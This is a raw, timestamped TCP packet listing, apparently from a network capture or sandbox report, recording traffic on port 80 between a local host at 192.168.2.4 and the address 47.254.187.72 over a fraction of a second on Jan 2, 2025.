                                                                            Jan 2, 2025 20:34:49.873960018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.873960972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.873980999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.874006033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.874011040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.874026060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.874037027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.874047995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.874057055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.874103069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.875123978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.875135899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.875147104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.875164032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.875194073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.875416994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.875428915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.875443935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.875461102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.875482082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.876837015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.876853943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.876866102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.876882076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.876909018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.877140045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.877186060 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.880019903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.880033970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.880083084 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.880101919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.880204916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.880217075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.880229950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.880249023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.880275011 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.881570101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.881586075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.881597042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.881618023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.881658077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.884320974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.884336948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.884351015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.884361982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.884373903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.884382010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.884407997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.886061907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.886092901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.886112928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.886127949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.886490107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.886502981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.886513948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.886540890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.886567116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.888104916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.888118029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.888129950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.888150930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.888174057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.890852928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.890877008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.890886068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.890896082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.890932083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.891041040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.891053915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.891063929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.891083002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.891104937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.892335892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.892350912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.892363071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.892378092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.892400980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.893891096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.893907070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.893918037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.893939018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.893963099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.894110918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.894121885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.894134998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.894150019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.894177914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.924314022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.924335003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.924346924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.924357891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.924370050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.924376965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.924381971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.924412966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.924458981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959160089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959182024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959202051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959213972 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959228039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959244967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959244967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959255934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959266901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959278107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959287882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959297895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959301949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959323883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959331036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959342003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959347963 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959353924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959364891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959377050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959378958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959405899 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959424019 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959424973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959435940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959462881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959462881 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959481955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959481955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959495068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959503889 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959503889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959515095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959521055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959532022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959541082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959543943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959553957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959566116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959570885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959577084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959590912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959594011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959603071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959604979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959618092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959629059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959636927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959640026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959651947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959672928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959697962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959712029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959722996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959732056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959743023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959754944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.959764004 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959784031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.959801912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960033894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960043907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960053921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960066080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960078001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960099936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960186958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960228920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960228920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960251093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960269928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960287094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960335970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960346937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960364103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960375071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960382938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960386038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960397005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960416079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960444927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960444927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960455894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960468054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960484028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960484028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960495949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960506916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960516930 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960519075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960549116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960568905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960591078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960602045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960613012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960629940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960633993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960640907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960650921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960658073 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960664034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960675001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960690975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960704088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960715055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960720062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960750103 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960766077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960777998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960788012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960805893 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960820913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960832119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960832119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960843086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960854053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.960865021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.960905075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.961913109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.961925983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.961935997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.961956024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.961961985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.961966991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.961977959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.961987972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.961998940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.962004900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.962039948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.963782072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.963831902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.963891029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.963902950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.963913918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.963926077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.963933945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.963936090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.963947058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.963958979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.963990927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.964008093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.971040964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.971096992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.971102953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.971115112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.971127033 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.971137047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.971143007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.971148968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.971162081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.971174002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.971223116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.973305941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.973319054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.973330021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.973347902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.973356962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.973357916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.973370075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.973376036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.973381042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.973414898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.977880001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.977915049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.977933884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.977942944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.977946997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.977958918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.977969885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.977972031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.977991104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.977993965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.978003025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.978015900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.978039980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.978051901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.980942011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.980984926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.980989933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.980997086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.981009007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.981019974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.981024981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.981050968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.981082916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.981096029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.981137037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:49.981147051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:49.981183052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.045950890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.045979023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.045991898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046003103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046015024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046025038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046036005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046045065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046066999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046083927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046093941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046094894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046104908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046118021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046128035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046293020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046293020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046322107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046334028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046344995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046355009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046366930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046371937 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046396017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046417952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046468019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046478987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046497107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046514034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046518087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046525002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046535969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046546936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046549082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046556950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046571970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046574116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046591997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046613932 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046655893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046668053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046679020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046689987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046700954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046710968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046710968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046724081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046746969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046747923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046758890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046766996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046781063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046791077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:50.046794891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:50.046802044 CET804973047.254.187.72192.168.2.4
